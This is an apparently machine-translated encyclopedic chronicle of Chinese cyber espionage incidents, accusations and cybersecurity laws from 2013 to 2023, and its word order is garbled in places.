Cybercrime and cyber conflicts: China

Main article: China

Industrial espionage by China

Main article: Industrial espionage by China

2023

The world's largest credit institution ICBC has been attacked by a ransomware virus. US Treasury trades halted

On November 9, 2023, the US division of the Industrial and Trade Bank of China (ICBC) was subjected to a powerful cyberattack using a ransomware program. As a result of the invasion, trading in US Treasuries was disrupted. Read more here.

Viruses installed at the factory found in Chinese TVs

On October 4, 2023, Human Security announced the identification of a large-scale cybercriminal campaign called Badbox, emanating from. China Through Internet sells various devices under control, the Android firmware of which initially contains malicious code. As a result, users, unaware of this, can be involved in activities. botnet More. here

US, Taiwan team up to defend against China's cyber attacks

Lawmakers in the US Congress have introduced a bill that would require the Pentagon to significantly expand cybersecurity cooperation with Taiwan to protect the island from cyber threats from China. This became known on April 23, 2023. Read more here.

Unexplored MgBot framework used by China in spying campaigns in Africa

Experts Symantec reported that China attacks telecommunication the company associated with the Daggerfly group has been in November 2022 To Africa with the aim of collecting intelligence. data This became known on April 21, 2023.

The Daggerfly campaign (Bronze Highland, Evasive Panda) uses previously undocumented plugins from the modular MgBot malware. Attackers also used a PlugX bootloader and abused legitimate AnyDesk remote desktop software.

In the detected attack chains, Daggerfly conducts a LotL attack (Living off the Land) using BITSAdmin and PowerShell to deliver the next stage payload, including the legitimate AnyDesk file executable and credential collection utility.

The cybercriminal then establishes consistency in the victim's system by creating a local account and deploying the MgBot framework. MgBot is an actively supported modular structure that includes an EXE dropper, DLL loader and plug-in plugins.

MgBot multifunctional plugins can provide attackers with a significant amount of information about a compromised machine. The modules perform the following actions:

• collecting browser data;
• keystrokes registration (keylogging);
• Capture screenshots
• sound recording;
• Listing Active Directory Enumeration.

All of these features allow hackers to collect a significant amount of information from victim computers. Plugin features also show that the main target of cybercriminals in this campaign is data collection, said Symantec[1].

Leakage of 10 GB of data, the database is sold for $150 thousand.

A certain user Breach Forums put up for sale data from Chinese military intelligence and secret documents of the Taiwanese special services with a total volume of 10 GB. For this information, he wants to receive $150 thousand, which became known in mid-January 2023. Read more here.

2022

China accuses NSA hackers of stealing space data from university

In early September 2022 Chinese , the National Computer Virus Response Center published a report stating that it National Security Agency USA had carried out attacks on Northwestern Polytechnic University in Xi'an. The attention of hackers was attracted by programs in the fields of aeronautics and space research. More. here

Chinese hackers attacked Russian defense enterprises

Chinese-language cyber group attacks defense enterprises state agencies and in, Russia countries Eastern and. Europe This was announced Afghanistan on August 8, 2022 by "." Kaspersky Lab More. here

1 billion Chinese people sell data on the dark web

In early July 2022, unknown persons put up for sale on the darknet a database that allegedly contains information about a billion Chinese citizens for 10 military-technical cooperation, which is more than $190 thousand. Read more here

Chinese cyber spies distribute malware through antiviruses

On May 25, 2022, it became known that the activities the Chinese hackers from Moshen Dragon were analyzed SentinelOne safety by a company specializing in endpoints. Experts compared the methods attacks malefactors and found matches with the methods of the RedFoxtrot and Nomad Panda groups.

SentinelOne in early May announced the use of antiviruses by hackers to side-load malicious DLLs and deliver malware to the systems of organizations, most of which were in Central Asia.

"Moshen Dragon hackers regularly used antivirus software to intercept DLL searches. The intercepted DLL was used to decrypt and load the final payload stored in the same folder, but in a different file, "- explained by SentinelOne specialists.

SentinelOne named Symantec, Trend Micro, Bitdefender, McAfee and Kaspersky as targets of cybercriminals. But only Trend Micro discovered and fixed the vulnerability by deploying a security update via ActiveUpdate on May 19. The company's experts in their report said they found no evidence of exploiting the vulnerability against their commercial and business products.

Earlier it became known about the Moshen Dragon attacks on the telecommunication Central Asian sector. Hackers downloaded the malicious ON ShadowsPad and PlugX into the victims' systems, and also used the Gunters backdoor.^[2]

China initiated a cycle of hacker attacks on Russian authorities

On May 4, 2022, it became known that China he went against Russia and initiated a cycle on the hacker attacks Russian authorities, analysts of Google the Threat Analysis Group (TAG) team report. According to their report, computer the Curious Gorge group attacks more actively than others. More. here

Chinese hackers attacked Ukrainian sites for cyber espionage

On February the Ukrainian 23, are attacked hackers China 2022, the sites were allegedly linked to. This became known on April 8, 2022. According to a spokesman for Western intelligence, the target of cybercriminals was. espionage More. here

Chinese group Scarab attacked companies in Ukraine

The Chinese group Scarab attacked companies in Ukraine. This became known on March 28, 2022. Read more here.

China accused the United States of hacking computers to organize cyber attacks on Russia and Ukraine

China has been subjected to continuous cyber attacks since February, during which Internet addresses in the United States were used to seize control of Chinese computers directed against Belarus, Russia and Ukraine. This became known on March 12, 2022.

CNCERT/CC monitoring showed that since the end of February, China's Internet has constantly faced cyber attacks from abroad. Foreign groups attacked Chinese users, taking control of computers in the country in order to carry out cyber attacks on Russia, Ukraine and Belarus, the newspaper quotes. - After analyzing, most of the addresses for these attacks came from the United States. Some addresses were from other countries, such as Germany and the Netherlands.

Cyberattacks have been a major source of tension between the United States and its allies and China, as the former accused China of running a global cyber espionage campaign.

At the beginning of the "special operation" in Ukraine, the National Coordination Center for Computer Incidents said that the level of threat of cyber attacks on Russian resources is critical and recommends taking measures to increase the security of information resources^[3].

2021

Three Chinese APT groups attacked large telecommunications companies

On August 3, 2021, it became known that a team of cybersecurity researchers Cybereason Nocturnus discovered three malicious cyber espionage campaigns aimed at hacking the networks of large telecommunications companies. Presumably, the attacks are carried out in the interests of China. Read more here.

Chinese government hackers attacked the Russian public sector

Chinese government hackers attacked Russian companies. This became known on August 3, 2021. Read more here.

China sets up cyber security centre to train military hackers

On July 30, 2021, information appeared that he China was engaged in the creation of the National Cybersecurity Center (National Cybersecurity Center,). NCC Investments in this major project have not been disclosed. More. here

China allocated $40 billion for the country's cyber defense

In early July 2021, the Ministry of Industry information technology PEOPLE'S REPUBLIC OF CHINA announced that it had developed a draft three-year action plan for the development of the country's cybersecurity sector. The project is focused on the regulatory settlement of the storage, transfer and confidentiality of personal data. The ministry expects that by 2023 the volume of the cybersecurity sector in the country's economy will exceed $38.6 billion, and the total annual growth rate will be over 15%.

The department's document states that the share of investments in network security in key industries, including telecommunications, is 10% of investments in IT. For key industries, the authorities recommend increasing investment in protecting network infrastructure and promoting the deployment and application of network security technologies, solutions and services, and for small and medium-sized enterprises to significantly increase their network security capabilities.

The project says that by 2023 it is planned to form a number of leading enterprises with operational advantages and advantages of network security, as well as a number of small and medium-sized enterprises for new areas, such as the Internet of Things (IoT), industrial Internet of Things, Internet vehicles, "smart city."

China has been building almost from scratch legal mechanisms in the field of cybersecurity since 2017 and is now at a late stage of their creation, - said EqualOcean analyst Ivan Platonov. - With the Data Security Act coming into effect in September, it is crucial to develop a comprehensive strategy that pushes the nation's businesses to increase their data security spending.

Platonov also noted that by July 2021, China accounts for only about 1% of global spending on cybersecurity services. With the rapid growth of the cloud/SaaS industry, cybersecurity investments are becoming increasingly important to the country.^[4]

In terms of its capabilities in cyberspace, China is 10 years behind the United States

According to^[5] of] the International Institute for Strategic Studies (IISS), in terms of cyberspace capabilities, China will not be able to catch up with the United States in the next ten years. Cybersil of the Celestial Empire is undermined by security problems and insufficient analysis of the obtained intelligence^[6].

The researchers ranked countries for their cyberspace capabilities, ranging from the level of their digital economy and the maturity of their intelligence and security functions to the level of integration of cyber facilities with military operations.

China, like Russia (), Cybercrime and cyber conflicts: Russia has proven its qualifications in conducting offensive cyber operations (cyber espionage operations, intellectual property theft and disinformation campaigns) against the United States and its allies. Still, both countries "capabilities are held back by comparatively low levels cyber security compared to their adversaries, according to the IISS. In this regard, the rating was headed only by the United States, and China, Russia,,,, and Great Britain Australia Canada were France Israel recognized as second-tier countries. The list of third-tier countries includes,,,,, and. India Indonesia Japan Malaysia DPRK Iran Vietnam

Internet According to the report, Beijing's focus on "content security" (restricting politically disruptive information in the Chinese segment) may have reduced its focus on controlling the physical networks through which it is transmitted. The IISS also suggested that intelligence analysis is "less China mature" compared to the Five Eyes intelligence alliance, which includes the US, UK, Canada, Australia and New Zealand, as Beijing was driven by ideology and "increasingly confused for political purposes" by Communist Party leaders.

China's People's Liberation Army may be behind attack on Japanese space agency

China's People's Liberation Army is suspected of cyber attacks on hundreds of targets in Japan, including on the space agency and defense enterprises^[7].

In 2016, the Japan Aerospace Exploration Agency (JAXA) was subjected to a cyber attack. According to the Japanese national television and radio company NHK, the Tokyo police managed to identify a citizen of the PRC who rented several servers in Japan, allegedly used in the attacks. By now, the suspect has already left the country, but despite this, on Tuesday, April 20, his case was transferred to the prosecutor's office.

The man, in his 30s, is a computer engineer and a member of the Chinese Communist Party. According to investigators, he rented servers five times in Japan under false names. The man passed the server ID and credentials to a Chinese hacker group known as Tick.

Another Chinese citizen also rented several servers in Japan under false names. It is assumed that the man acted on the orders of the Bureau 61419 - a structure inside the People's Liberation Army of China, engaged in the implementation of cyber attacks.

According to the Tokyo police, the Chinese People's Liberation Army ordered a series of cyber attacks on Japanese organizations from Tick, which killed two dozen companies and research institutes.

According to representatives of JAXA, unknown persons did gain unauthorized access to the networks of the space agency, but did not cause any damage (for example, data leaks).

According to information security expert Iwai Hiroki, Tick is one of the private hacker groups working for the People's Liberation Army and the Chinese special services. The group began operations in the early 2000s and specializes in complex and well-designed attacks on aerospace research organizations.

Chinese cyber spies steal 5G data around the world

Chinese cybercriminals from last fall began attacking telecommunications companies in Asia, Europe and the United States to steal 5G information^[8].

According to^[9] in March 2021, McAfee cyber spies are trying to trick employees of a telecommunications company into a malicious site disguised as a page with vacancies in the company. Huawei Phishing the site asks users to install an update software Flash posted on the malicious site. The malicious file downloads and installs a backdoor on that .NET will communicate with the attackers' remote infrastructure through the Cobalt Strike beacon.

According to experts, with the help of phishing attacks, cyber spies are trying to gain a foothold in the internal networks of telecommunications companies. Experts have recorded attacks against telecommunications companies in Southeast Asia, Europe and the United States, but the group also shows "great interest in telecommunications companies in Germany, Vietnam and India."

Experts associated the methods, tactics and procedures used in this campaign with the Chinese groups Red Delta and Mustang Panda. While experts suggest Red Delta and Mustang Panda may be the same grouping, they currently have no further evidence.

"We assume that the motivation for this particular campaign is related to the ban on Chinese technologies in the global deployment of 5G," experts said.

Some countries targeted by the Mustang Panda group have already made public statements about their intention to ban or restrict Huawei's participation in the rollout of national 5G networks, such as the United States, Spain and Italy. However, attacks have also been observed in countries where Huawei has already signed similar contracts.

2020

Taiwan accuses Beijing of cyber attacks on government agencies

Hacker groups allegedly supported by the government China are carried out cyber attacks in order to infiltrate the networks of governmental Taiwan's departments and steal confidential information of citizens as part of ongoing attempts to influence democratic society. This was announced in August by cyber security the deputy head of the Taiwan Bureau of Investigation Liu Chia-zun^[10]

According to the official, hackers "for a long time" have been hacking into the systems of Taiwanese companies providing information services to government agencies in an attempt to obtain state information and personal data of citizens.

Four groups are behind the attacks - Blacktech, Taidoor, MustangPanda and APT40. Due to the fact that hackers carefully hide traces of their activities, experts have not yet been able to determine what data was stolen, with the exception of one case when about 6 thousand government emails fell into the hands of attackers, Liu said.

He also added that Taiwan has investigated roughly 10 cases involving cyberattacks by Chinese hackers since 2018. According to the head of the country's Cybersecurity Department, Jian Hong-wei, the Chinese authorities carry out about 30 million cyber attacks per month in Taiwan.

US does not want to lay communication cable with China due to the threat of cyber espionage

On June 22, 2020, it became known that the United States does not want to lay a communication cable with China due to the threat of cyber espionage. The cable will allegedly allow Chinese intelligence services to gain access to American data. Read more here.

PRC will update cybersecurity rules for critical infrastructure

From June 1, 2020, an updated cybersecurity verification system will come into force in China, designed to strengthen the country's national cybersecurity. The rules will affect both Chinese and foreign providers of network products and services for strategic industries such as communications, radio and television, power, finance, transportation, rail and civil aviation. This became known on April 29, 2020.

The Administration of Cyberspace of the PRC, together with 11 relevant departments, published a document entitled "Measures to verify cybersecurity" on April 27. According to China Daily, it spells out obligations to comply with cybersecurity in accordance with the "Cybersecurity Law," which has been in force in China since June 1, 2017.

The introduction of this verification system will help eliminate potential risks, ensure public safety and security of national cyberspace, and also contribute to the healthy and orderly development of the information industry, the authors of the document say.

According to the rules, operators of critical information infrastructure purchasing network products and services (if these products and services may affect national security) must undergo a national security audit.

The document also obliges operators to assess potential cyber risks associated with the products and services they purchase. If potential threats are detected, such as illegal control and damage to key IT infrastructure, leakage, loss and damage to key data, operators are required to contact the cybersecurity review bureau for further verification.

The "Law on Cybersecurity of the PRC" is the main regulatory act governing the sphere of Internet security of the PRC. The document regulates the actions of providers of network products and services for the collection, storage and processing of user data, determines the procedure and specifics for ensuring the security of information infrastructure in strategically important sectors of^[11].

CIA suspected of 11-year cyber espionage against China

• The Chinese INFORMATION SECURITY The company Qihoo 360 published a report linking the Central Intelligence Agency USA CIA to a long-term cyber espionage campaign targeting Chinese industrial and government organizations. This became known on March 4, 2020. The campaign continued between September 2008 and June 2019 and most of the targets were located in, Beijing Guangdong and Zhejiang, the researchers said. More. here

2019

China again uses the Great Cannon for DDoS attacks

According to analysts AT&T Cybersecurity, the Chinese authorities have reactivated the Great Cannon, a powerful tool for DDoS attacks that was last used two years ago^[12][13]See more here.

Is China behind the attacks on Australia's parliament?

In the fall of 2019, Australian intelligence managed to establish that the cyberattacks on the country's parliament and the three largest political parties are behind the May elections. China Reuters This was reported to the news agency by at least five informed sources who wished to remain anonymous. According to sources, in March of this year, the Australian Signals Directorate established that the aforementioned cyber attacks were implemented by state the Ministry of Security of the PRC. The Australian authorities have prepared a corresponding report, including information obtained by the Australian Department of Foreign Affairs, but they intend to keep it secret in order to avoid a deterioration in trade and economic relations between the two states.

The Australian government did not press any charges towards China, and Prime Minister Scott Morrison's office declined to answer questions from Reuters. In turn, the Ministry of Foreign Affairs of the PRC refutes any accusations of cybercriminal activities, noting that the Internet is teeming with all kinds of theories that cannot be proved.

Chinese hackers hack HPE, IBM and six more of the world's largest IT providers

Hackers who work for the Chinese Ministry of state Security hacked into the networks of the eight largest technology service providers, writes in June 2019. Reuters Their goal was to steal the commercial secrets of the customers of these companies, according to an agency source familiar with the situation. This hacker campaign was called Cloud Hopper^[14]

Hackers managed to compromise the data of at least eight providers: Hewlett Packard Enterprise (HPE), IBM, Fujitsu, Tata Consultancy Services, NTT Data, Dimension Data, Computer Sciences Corporation and DXC Technology (formerly Computer Sciences). Cloud Hopper was known earlier, but only HPE and IBM were named among the victims until today.

Reuters was also able to determine which companies were customers of these providers. The list includes Swedish telecommunications giant Ericsson, US shipbuilding company Huntington Ingalls Industries and travel booking system Sabre.

According to Robert Hannigan, former director of the UK Government Communications Center and current chairman of information security firm BlueVoyant, the effect of a series of Cloud Hopper attacks has been devastating. The Chinese government denies any involvement.

US NSA malicious code interception

On May 10, 2019, it became known that the Chinese cyber intelligence agents managed to intercept the harmful code NSA and use it against allied countries. USA

Based on the time when these attacks occurred, and the hints identified in the computer code, Symantec researchers concluded that Chinese cyber specialists did not steal NSA hacker tools, but literally intercepted them during an attack on their own systems.

Symantec does not directly name in its publication China , instead using the designations "Buckeye grouping" and APT3. However, the Ministry of Justice and USA other organizations dealing with the issue cyber security thus designate a structure acting as a contractor for the Ministry of state Security, PEOPLE'S REPUBLIC OF CHINA which is headquartered in Guangzhou. In 2017, the US Department of Justice brought charges against three Chinese hackers, who were named members of Buckeye and APT3.

For the NSA, Symantec also uses the symbol Equation Group. So at the beginning of 2015, "Kaspersky Kaspersky)" named the creators of the framework for the development of cyber weapons. There has been a steady consensus in the global cybersecurity industry that Equation is a group of cyber experts in the service of the US National Security Agency.

In August 2016, an unknown group Shadow Brokers began publishing exploits and other malicious tools belonging to the Equation Group, either stolen or "leaked" by an insider. All these exploits were shared in April 2017 and have since been used several times by various cybercriminals (just remember the global epidemic encoder WannaCry).

Meanwhile, according to Symantec, modified versions of two tools from this set - in particular, Eternal Synergy and Double Pulsar - were used APT3 in their attacks back in March 2016. Thus, these tools got to the Chinese hackers before their "leak." "

Symantec experts indicate that these tools attacked commercial and scientific structures in five countries - Belgium, Luxembourg, Vietnam, the Philippines and Hong Kong. At least one attack was aimed at a large telecommunications network; as a result, attackers could access hundreds of thousands or even millions of private messages.

The company noted that for the first time they see how someone else's malicious code is intercepted "on the fly" and turned to the allies of its alleged creators. At the same time, APT3 did not attack the infrastructure in the United States with the help of these exploits, probably assuming the presence of protective equipment and not wanting to give them the opportunity to use these exploits. Moreover, earlier APT3 repeatedly attacked the US infrastructure using other means, and sometimes very successfully.

The leakage of Equation exploits had very far-reaching consequences for the NSA: the entire arsenal accumulated over the years had to be immediately submitted to Microsoft so that it would release fixes for vulnerabilities previously used by Equation. The NSA also had to wind down several key anti-terrorism programs.

Moreover, the "merged" tools were quickly at the disposal of North Korea and Russia. The sensational attacks on the transport corporation Maersk, on the British health care system and the civilian infrastructure of Ukraine are associated with this.

However, the main conclusion from this situation is that the US intelligence services demonstrated, and not for the first time, the inability to reliably store their cyber weapons. The question again arose in US intelligence circles whether it makes sense to develop a cyber weapon if it is impossible to prevent it from falling into the hands of enemies.

Information about the existence of Stuxnet and cyber weapons as such in 2011 slipped out only because, due to an error in the code, this "warworm" went beyond the perimeter of the target area of ​ ​ use. Cyber ​ ​ weapons are a "double-edged sword," and, as this story proves, no one is immune from the fact that it will not be used against its own developers. Worst of all, however, is that with its destructive potential, comparable only to the WMD, there are still no official international agreements governing its application. This does not bode well for the world.

According to Symantec, after the charges brought by the US Department of Justice against alleged members of Buckeye and APT3 in 2017, the group nullified its activity. However, attacks using the same modified tools continued until September 2018^[15].

2018

NYT: Chinese cyber spies intercepted diplomatic correspondence of EU countries for three years

Cyber ​ ​ spies penetrated the network of diplomatic communications European Union and for three years intercepted thousands of telegrams related to various issues, including concern about the unpredictable actions of the presidential administration, USA Donald Trump attempts to confront the Russian Federation and China and the risks associated with the resumption of the nuclear program, the Iran publication reported The New York Times^[16]

The newspaper had 1,100 confidential documents at its disposal, including memoranda of conversations with the leaders of Saudi Arabia, Israel and other countries, messages from European diplomats about actions, Russia reports on private negotiations with Chinese President Xi Jinping and conversations with American officials about the meeting of US and Russian Presidents Donald Trump Vladimir Putin and at a summit Helsinki in July 2018.

Judging by the techniques used, an elite hacker unit of the People's Liberation Army of China may be involved in the hack, according to experts from the information security company Area 1, who discovered the data leak. Phishing attackers infiltrated Cyprus' national systems and stole passwords that allowed them access to the entire EU database, they said. Next, they copied telegrams from secure networks and posted them on an accessible site they created.

According to the publication, in addition to EU systems, attackers also compromised the networks of the UN, the American Federation of Labor and Congress of Industrial Organizations (AFL CIO -) and the Ministries of Finance and Foreign Affairs in countries around the world. In total cybercriminals , more than a hundred organizations and institutions were attacked, but many of them did not suspect of hacking until recently.

The National Security Agency is still looking into the "European archive." Experts have repeatedly warned the EU about the use of outdated systems and the risks of hacker attacks from China, Iran and other countries. However, in response to warnings, officials usually shrugged, the newspaper writes.

As European officials emphasized, confidential materials and messages labeled "secret" and "top secret" are processed in a different way than documents that cybercriminals managed to intercept. They also noted that a EC3IS network is being developed for confidential diplomatic correspondence, and another network, Zeus, is provided for communications in capitals such as Moscow and Beijing for delegations of EU member states.

Chinese "cybersecurity standards" aimed at fighting competitors

The PRC government is using 300 so-called "national cybersecurity standards" to prevent foreign technology companies from entering the Chinese market. Such conclusions are contained in the report of the American Center for Strategic and International Studies (CSIS^[17].

The above standards are documents developed by the PRC National Technical Committee for Standardization in the Field of Information Security. They contain various recommendations for the design and functionality of a number of products from the point of view of cybersecurity. The recommendations cover products such as routers, firewalls and even software.

Some standards describe methods for giving the government access to sensitive data of Chinese citizens processed by certain services or devices. Some standards deal with acceptable encryption algorithms, while others describe the requirements for data transmission technologies outside the country.

According to the Chinese authorities, at present the standards are only advisory in nature. Still, many are mandatory for Chinese companies, according to the CSIS report. Moreover, Chinese companies cannot purchase products from vendors that are not certified according to certain standards, since as a result, the resulting product will not comply with the recommendations. This will significantly complicate the attempts of foreign manufacturers to get into the Chinese market, experts are sure.

"In order to meet some standards, foreign firms will have to redesign their products specifically for the Chinese market due to the inconsistency of these standards with the international one," CSIS experts write.

Chinese hackers attacked space satellites

On June 20, 2018, antivirus manufacturer Symantec announced a large-scale cyber attack organized by Chinese hackers on space, defense and telecommunications complexes in the United States and Asia. 

According to experts, a group called Thrip is behind the cyber attacks on satellite operator companies, as well as a number of telecommunications enterprises and defense contractors. It pursued the goal of espionage and interception of data from civilian and military communication channels. 

It is noted that as a result of cyber attacks, their organizers managed to introduce viruses into computers used to control space satellites. As a result, crackers were able to change the geoposition of satellites in orbit and interfere with the transfer of information to the ground.

Symantec CEO Greg Clark says that criminals used standard operating system tools, which is why victims did not even notice any anomalies. The hackers acted extremely carefully, penetrated the networks and were disclosed only using artificial intelligence capable of identifying and tracking their actions, he added.

Disruption of satellites can lead to problems in the functioning of civilian and military facilities, said Symantec CTO Vikram Thakur.

According to him, the problem concerns all people. Satellites are extremely important for the normal operation of mobile devices, as well as for determining geolocation in many areas of life.

Symantec sent data on the cyber attack  to the FBI and the US Department of Homeland Security. The competent authorities of a number of Asian countries affected by the actions of hackers were also notified of the incident.

According to Symantec, by June 20, 2018, hacked networks were protected from further penetration by hackers.^[18]

US closes market from Huawei smartphones

An initiative group of lawmakers suspected Chinese smartphones Huawei Mate 10 of being able to spy on users, The Wall Street Journal reported in early 2018. The group sent a letter to the US Federal Communications Commission expressing concerns that Huawei was allegedly cooperating with a certain broadcaster and Chinese intelligence agencies, and accused the Chinese manufacturer of ignoring intellectual property rights.

In this regard, one of the largest American mobile operators AT&T refused to sell Huawei Mate 10 smartphones. According to various media reports, the deal fell through due to pressure from the US communications commission. As the authors of the letter hinted, the deal with AT&T could strengthen Huawei's position in the US market and ultimately open up the possibility of using the company's smartphones by American officials.

2017

Indian authorities advise military to remove Chinese apps from phones due to surveillance risk

As it became known on December 11, the Ministry of Defense of India recommended the troops stationed on the Indian-Chinese border to remove the applications developed in China from their smartphones.

According to the recommendations, Chinese applications transfer user data to servers located in China and the Chinese government can use the information collected to determine the location of Indian troops.

The Ministry of Defense also compiled a list including 42 apps recommended for removal for Android and iOS. The list includes several popular apps such as Weibo, Wechat, UC Browser and CM Browser.

Earlier, Indian authorities banned the use of Chinese equipment from Huawei and ZTE in the border region. Despite tensions between the two countries, there is no blanket ban on Chinese products in India. Any bans on Chinese goods apply only in the demarcation zone on the India-China border.

China approved a plan to create the first Internet court

As it became known on July 28, in China, during the 36th session of the Central Committee of the Communist Party of China on the comprehensive deepening of reforms, a plan was approved to create the country's first Internet court, CCTV reports.^[19]

The Internet court, which will appear in Hangzhou, Zhejiang province, will consider exclusively cases related to cybercrime, including cases of online debt contracts, copyright infringement on the Internet, cases of online fraud, etc.

It is assumed that all judicial procedures, starting with the filing of a lawsuit, will be carried out on the court's website. The hearings will also be broadcast in real time.

The start date of the Internet court has not been announced.

As noted, the court system of Hangzhou is already conducting many cases of cybercrime, and their number continues to grow. So, in 2013, the court considered about 600 such cases, and in 2016 their number exceeded 10 thousand.

2016

Zecurion: China in second place in cyber military financing

Russia may be in the top 5 countries with the most developed cyber warfare - specialized units cyber security for military or intelligence purposes. This is evidenced by the data of Zecurion the Analytics study, which leads "" Kommersant^[20][21]

So, according to the study, the most developed cyber warheads in the world are currently possessed. USA According to analysts, state funding for this area in the States can be about $7 billion a year, and the number of hackers cooperating with the state - 9 thousand people.

In second place in Zecurion was put, Chinawhere funding for this area can be $1.5 billion per year, and cyberarmia is estimated as the largest, up to 20 thousand people.

The exact figures in the company refused to disclose, however, according to the interlocutor of the publication in the information security market, Russia's spending on cyber warfare is about $300 million per year, and the number of Russian special forces is about 1 thousand people.

The top three countries where the most developed special forces on cybersecurity are closed by the United Kingdom, which allocates $450 million a year to cyber troops consisting of 2 thousand people. In fourth place is South Korea with a budget of $400 million per year and a composition of 700 hackers.

China threatened to use military force for its cybersecurity

China intends to take all necessary measures to ensure its information security, not excluding the use of military force. This was stated at a press conference in Beijing by the Head of the Cybersecurity Bureau of the Cyberspace Administration of the People's Republic of China Zhao Zeliang^[22].

He also called for the creation of a "safe and controlled" Internet and presented a plan to audit all "key information products and services" supplied to the country by foreign companies. The sale of such products will be possible only after due diligence. Developments focused on government organizations and industrial complexes will be tested with double zeal.

International relations factor

During the presidency of the current head of state Xi Jinping, the topic of cybersecurity has become a significant factor in international relations. China is regularly accused of carrying out targeted cyber attacks against other countries, while information about US cyber espionage operations has become public. Numerous accusations of cyber attacks are also heard against Russia.

It is known that in the People's Liberation Army of the PRC there are at least two units responsible for conducting military and intelligence operations in the field of computer networks - units 61398 ("2nd Bureau") and 61046 ("8th Bureau"). It is believed that the first of these groups specializes in cyber espionage against and USA Canada, and the second - against countries. Europe

New cybersecurity law adopted in China

In China, the standing committee of the National People's Congress adopted a new law on cybersecurity, according to which the storage of personal data of citizens should now be carried out only in the country.

In order to ensure cybersecurity, Chinese law enforcement agencies also got the opportunity to legally block the accounts of foreign companies and organizations that are suspected of destabilizing the information structure of the PRC.

Many international experts believe that in this way the PRC government is more likely to protect its IT services market, since citizens of the republic will be afraid to use foreign software and gadgets.

See also the Law on Personal Data No. 152-FZ in Russia.

Espionage by Chinese hackers

In May 2016, the information security company Symantec reported that it had tracked the hacking of a number of Indian resources carried out by the Chinese cyber spy group Suckfly. Among the resources were the systems of the central government and large financial institutions^[23].

The data leak began in April 2014 and continued throughout 2015. Symantec considers the purpose of espionage to be the undermining of economic infrastructure. In India its work, Suckfly uses spyware, the ON security of which is certified by stolen digital certificates. The group also uses malware Backdoor.Nidoran.

A week later, Kaspersky Lab said it had tracked the Chinese-speaking cyber spy group Danti's invasion of India's central government systems through diplomatic channels. The attack exploited an unregistered CVE-2015-2545 vulnerability.

Both cases did not receive widespread coverage in India, and the attacked organizations did not comment. The lack of any serious reaction to cyber attacks by the Indian government makes the country vulnerable to further attacks, writes The Wire.

Official creation of a cyber army

On January 1, 2016, a military reform came into force in China, within the framework of which three new branches of troops were created. One of them, among other things, dealt with issues of national cybersecurity.

According to the report of the Central Military Council of the PRC, the department of the army command, missile troops and strategic support troops appeared in the People's Liberation Army of China. The latter, in particular, will be responsible for the security of the digital space. More information about the activities of the cyber group has not been disclosed.

According to the President of the People's Republic of China and the head of the Central Military Council Xi Jinping, the transformations carried out should contribute to the "realization of the Chinese dream of strengthening the army" in modern conditions.

"This is a strategic measure to form a modern military system taking into account Chinese features. This step will be a turning point in the modernization of the Chinese military system, "the Chinese leader said during the ceremony of transferring banners to the commanders of the newly made military branches

.

The goal of the new military reform is to optimize the country's defense structure, strengthen the political system and civil-military integration. In addition, attention is paid to the construction of a modern military system with an understanding of Chinese specifics that can win modern information wars.

By the beginning of 2016, the Chinese army is the largest in the world, and the country is second only to the United States in terms of military spending. The total number of the armed forces of the PRC is estimated at about 2.3 million people against 5 million by the beginning of the 80s of the XX century. Most of the cuts affected the ground forces.^[24]

2015: China's cyber warfare not only defends itself

On March 19, 2015, from the official military encyclopedia of the People's Liberation Army of China, it became known about the existence of cyber warfare in China, the combat mission of which is not only defense, but also an attack on networks of foreign states. Earlier, Beijing categorically denied information about its participation in cyber attacks^[25].

As part of the Chinese armed forces, there are special forces carrying out cyber attacks on the computer networks of foreign countries, according to the latest edition of the encyclopedia The Science of Military Strategy, released by the People's Liberation Army of China in its native language and representing "the best manual on the Chinese military machine."

According to The Daily Beast, citing the encyclopedia, there are two hacker units in China. One of them is under the armed forces, the second is part of the intelligence services.

In addition, some non-governmental "external groups" work. They can be organized and mobilized as needed, quotes The Daily Beast excerpts from the encyclopedia.

'We

first found out about it. For the first time, they told us literally this: "Yes, we have the forces conducting attacks in cyberspace. And we have as many as two divisions whose work is devoted to this, "Joe McReynolds, an analyst at the Center for Intelligence Research and Analysis at Defense Group, told The Daily Beast, explaining that one of them, according to the encyclopedia, operates under structures similar to the American CIA and FBI

.

Beijing has always officially denied the participation of the Chinese authorities in attacks on the computer networks of foreign countries. Moreover, the latest edition of the Science of Military Strategy was published in December 2013. "It seems that they understood that we would not be able to prove it in any way, so they continued to insist that they were not engaged in cyber attacks," the expert suggested.

According to McReynolds, in full form, the book did not fall into the hands of American military experts immediately, but only in the summer of 2014. It took several more months to translate from Chinese.

The United States has been collecting evidence about the involvement of official Beijing in some attacks on its computer networks for several years. Last year, the US Department of Justice took the unprecedented step of indicting five Chinese military officials who, according to US intelligence, engage in diplomatic and industrial espionage through hacking into the networks of American authorities and enterprises.

In 2010, a cyber command was created in the United States. The American authorities assure that it is engaged exclusively in the defense of networks. That claim has also been called into question. In the same 2010, experts found, US intelligence agencies carried out a series of attacks on Iranian nuclear facilities to disable them.

2013: Behind massive cyber attacks on the US is a Chinese organisation

Mandiant published a report in early 2013 suggesting that hundreds of cyber attacks on the US in recent years are the work of an organisation based in China. The attacks are massive in nature, with hundreds of terabytes of data stolen from at least 141 organizations.

Criminals steal intellectual property, but can secretly be present on a computer for a year, carrying out surveillance, writes Mandiant, which has a special group for analyzing cyber attacks. The firm believes it has found sufficient evidence to link the attacks to one of 20 cybercriminal organisations operating under the cover of the Chinese government.

Mandiant analyzed the activities of the APT1 group and documented the facts of its hacks over seven years. In its report, titled "APT1: One of China's Cyber Espionage Outposts," the firm writes that it has irrefutable evidence indicating the group's location in Shanghai, but the activity directly monitored by Mandiant's specialists accounts for only a fraction of its cyber espionage.

"The details we analyzed in hundreds of inspections convince us that the groups carrying out these activities are located mainly in China and that the government of this country is well aware of them," the firm wrote in its report. "Our observations indicate that in terms of the amount of information stolen, this is one of the most 'prolific' cyber espionage groups."

The tactics of Chinese cybercriminals are diverse and include "social engineering," "hard" phishing (spearphishing), remote access tools and more than 40 malware families.

In its report, Mandiant listed thousands of signs of attacks, including domain names and IP addresses, that could indicate it was the work of APT1. The report is accompanied by digital certificates and video files that demonstrate the real actions of hackers. Attached is also a free utility to identify infected systems.

Cybercriminals kept companies from 20 major industries under "surveillance," Mandiant writes. Periodically for several months or years, they visited such an "opened" network, stealing technical plans, information about proprietary technological processes, test results, business plans, price information, partnership agreements, emails and contact lists of the leaders of these organizations. At least one organisation had been in such "custody" for nearly five years before it was discovered.

In just one month of 2011, a group of APT1 penetrated the networks of 17 organizations, 87% of the "observed" organizations are in the English language countries, Mandiant writes.

